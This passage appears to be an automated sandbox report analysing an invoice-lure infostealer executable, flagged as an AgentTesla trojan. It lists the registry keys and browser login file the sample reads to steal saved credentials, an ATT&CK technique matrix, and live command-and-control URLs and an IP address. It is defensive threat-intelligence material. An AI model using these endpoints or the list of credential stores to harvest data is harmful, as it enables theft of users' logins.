            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.255109806.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: INV.2022LB0362 FORM CO (2).exe PID: 6092, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: INV.2022LB0362 FORM CO (2).exe PID: 6132, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000003.00000002.506514782.0000000001238000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.INV.2022LB0362 FORM CO (2).exe.2be79e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.255109806.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management InstrumentationPath Interception11
            Process Injection
            1
            Masquerading
            2
            OS Credential Dumping
            11
            Security Software Discovery
            Remote Services1
            Email Collection
            Exfiltration Over Other Network Medium1
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools
            1
            Credentials in Registry
            1
            Process Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            Exfiltration Over Bluetooth2
            Non-Application Layer Protocol
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
            Virtualization/Sandbox Evasion
            Security Account Manager21
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares2
            Data from Local System
            Automated Exfiltration112
            Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
            Process Injection
            NTDS1
            Remote System Discovery
            Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information
            LSA Secrets13
            System Information Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common12
            Software Packing
            Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Timestomp
            DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            INV.2022LB0362 FORM CO (2).exe71%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            INV.2022LB0362 FORM CO (2).exe56%VirustotalBrowse
            INV.2022LB0362 FORM CO (2).exe100%Joe Sandbox ML
            No Antivirus matches
            SourceDetectionScannerLabelLinkDownload
            0.2.INV.2022LB0362 FORM CO (2).exe.3f9bcd8.14.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            3.0.INV.2022LB0362 FORM CO (2).exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            0.2.INV.2022LB0362 FORM CO (2).exe.3f81cb8.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            SourceDetectionScannerLabelLink
            sempersim.su25%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
            http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://alphastand.top/alien/fre.php0%URL Reputationsafe
            http://www.ibsensoftware.com/0%URL Reputationsafe
            http://www.ibsensoftware.com/0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://alphastand.win/alien/fre.php0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://alphastand.trade/alien/fre.php0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://sempersim.su/gm11/fre.php25%VirustotalBrowse
            http://sempersim.su/gm11/fre.php100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            sempersim.su
            95.213.216.202
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://kbfvzoboss.bid/alien/fre.phptrue
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://alphastand.top/alien/fre.phptrue
            • URL Reputation: safe
            unknown
            http://alphastand.win/alien/fre.phptrue
            • URL Reputation: safe
            unknown
            http://alphastand.trade/alien/fre.phptrue
            • URL Reputation: safe
            unknown
            http://sempersim.su/gm11/fre.phptrue
            • 25%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://www.apache.org/licenses/LICENSE-2.0INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.fontbureau.comINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.fontbureau.com/designersGINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.fontbureau.com/designers/?INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.founder.com.cn/cn/bTheINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designers?INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.ibsensoftware.com/INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.262961989.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.259415034.0000000002BE7000.00000004.00000800.00020000.00000000.sdmp, INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.262806149.0000000003F48000.00000004.00000800.00020000.00000000.sdmp, INV.2022LB0362 FORM CO (2).exe, 00000003.00000000.255109806.0000000000415000.00000040.00000400.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.tiro.comINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designersINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.goodfont.co.krINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.carterandcone.comlINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.sajatypeworks.comINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.typography.netDINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.com/designers/cabarga.htmlNINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.founder.com.cn/cn/cTheINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.galapagosdesign.com/staff/dennis.htmINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://fontfabrik.comINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.founder.com.cn/cnINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers/frere-jones.htmlINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.jiyu-kobo.co.jp/INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.galapagosdesign.com/DPleaseINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designers8INV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fonts.comINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.sandoll.co.krINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.urwpp.deDPleaseINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.zhongyicts.com.cnINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.sakkal.comINV.2022LB0362 FORM CO (2).exe, 00000000.00000002.263729189.0000000006AF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                95.213.216.202
                                sempersim.suRussian Federation
                                49505SELECTELRUtrue
                                Joe Sandbox Version:36.0.0 Rainbow Opal
                                Analysis ID:756310
                                Start date and time:2022-11-30 00:53:06 +01:00
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 5m 33s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Sample file name:INV.2022LB0362 FORM CO (2).exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:15
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@7/3@61/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HDC Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 12
                                • Number of non-executed functions: 3
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 8.238.190.126, 8.241.126.249, 8.241.121.126, 8.253.204.249, 8.253.204.120
                                • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                TimeTypeDescription
                                00:54:02API Interceptor59x Sleep call for process: INV.2022LB0362 FORM CO (2).exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                95.213.216.202SecuriteInfo.com.Win32.CrypterX-gen.24384.7341.exeGet hashmaliciousBrowse
                                • sempersim.su/gm14/fre.php
                                RFQ MV-Haian.exeGet hashmaliciousBrowse
                                • sempersim.su/gm9/fre.php
                                SecuriteInfo.com.Win32.CrypterX-gen.15258.5029.exeGet hashmaliciousBrowse
                                • sempersim.su/gm10/fre.php
                                SecuriteInfo.com.Win32.PWSX-gen.30740.26234.exeGet hashmaliciousBrowse
                                • sempersim.su/gm14/fre.php
                                Draft Of Shipping documents.xlsGet hashmaliciousBrowse
                                • sempersim.su/gm14/fre.php
                                OeMHRbLPPUrH75t.exeGet hashmaliciousBrowse
                                • sempersim.su/gm15/fre.php
                                JRcIUY67u1.exeGet hashmaliciousBrowse
                                • sempersim.su/gm13/fre.php
                                GlPks3hdy5.exeGet hashmaliciousBrowse
                                • sempersim.su/gm5/fre.php
                                Quotation_2200001635.exeGet hashmaliciousBrowse
                                • sempersim.su/gm18/fre.php
                                cotizaci#U00f2n.PDF.vbsGet hashmaliciousBrowse
                                • sempersim.su/gm16/fre.php
                                Nueva lista de pedidos.vbsGet hashmaliciousBrowse
                                • sempersim.su/gm17/fre.php
                                E800 quotation20111209.exeGet hashmaliciousBrowse
                                • sempersim.su/gm18/fre.php
                                SecuriteInfo.com.Win32.PWSX-gen.31845.11524.exeGet hashmaliciousBrowse
                                • sempersim.su/gm11/fre.php
                                Quotation_qaOxW8.exeGet hashmaliciousBrowse
                                • sempersim.su/gm10/fre.php
                                xmwIOV9lPwSJpGz.exeGet hashmaliciousBrowse
                                • sempersim.su/gm10/fre.php
                                SecuriteInfo.com.Trojan.Packed2.44597.21015.23374.exeGet hashmaliciousBrowse
                                • sempersim.su/gl22/fre.php
                                D7Rt88Sonf.exeGet hashmaliciousBrowse
                                • sempersim.su/gm13/fre.php
                                PCdn1pc3gr.exeGet hashmaliciousBrowse
                                • sempersim.su/gl16/fre.php
                                c0fBsahFN8.exeGet hashmaliciousBrowse
                                • sempersim.su/gl16/fre.php
                                swift copy.xlsGet hashmaliciousBrowse
                                • sempersim.su/gm13/fre.php
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                sempersim.suSecuriteInfo.com.Win32.CrypterX-gen.24384.7341.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                RFQ MV-Haian.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                SecuriteInfo.com.Win32.CrypterX-gen.15258.5029.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                SecuriteInfo.com.Win32.PWSX-gen.30740.26234.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                Draft Of Shipping documents.xlsGet hashmaliciousBrowse
                                • 95.213.216.202
                                OeMHRbLPPUrH75t.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                JRcIUY67u1.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                GlPks3hdy5.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                Quotation_2200001635.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                cotizaci#U00f2n.PDF.vbsGet hashmaliciousBrowse
                                • 95.213.216.202
                                Nueva lista de pedidos.vbsGet hashmaliciousBrowse
                                • 95.213.216.202
                                E800 quotation20111209.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                SecuriteInfo.com.Win32.PWSX-gen.31845.11524.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                Quotation_qaOxW8.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                xmwIOV9lPwSJpGz.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                SecuriteInfo.com.Trojan.Packed2.44597.21015.23374.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                D7Rt88Sonf.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                PCdn1pc3gr.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                c0fBsahFN8.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                swift copy.xlsGet hashmaliciousBrowse
                                • 95.213.216.202
                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                SELECTELRUSecuriteInfo.com.Win32.CrypterX-gen.24384.7341.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                l.out.elfGet hashmaliciousBrowse
                                • 176.113.115.124
                                RFQ MV-Haian.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                SecuriteInfo.com.Win32.CrypterX-gen.15258.5029.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                SecuriteInfo.com.Win32.PWSX-gen.30740.26234.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                Draft Of Shipping documents.xlsGet hashmaliciousBrowse
                                • 95.213.216.202
                                OeMHRbLPPUrH75t.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                JRcIUY67u1.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                PO KIPO000903 KIND122822.exeGet hashmaliciousBrowse
                                • 31.184.217.9
                                GlPks3hdy5.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                Quotation_2200001635.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                http://saylor2xbtc.comGet hashmaliciousBrowse
                                • 92.119.160.56
                                cotizaci#U00f2n.PDF.vbsGet hashmaliciousBrowse
                                • 95.213.216.202
                                Nueva lista de pedidos.vbsGet hashmaliciousBrowse
                                • 95.213.216.202
                                E800 quotation20111209.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                SecuriteInfo.com.Win32.PWSX-gen.31845.11524.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                Quotation_qaOxW8.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                xmwIOV9lPwSJpGz.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                SecuriteInfo.com.Trojan.Packed2.44597.21015.23374.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                D7Rt88Sonf.exeGet hashmaliciousBrowse
                                • 95.213.216.202
                                No context
                                No context
                                Process:C:\Users\user\Desktop\INV.2022LB0362 FORM CO (2).exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.355304211458859
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
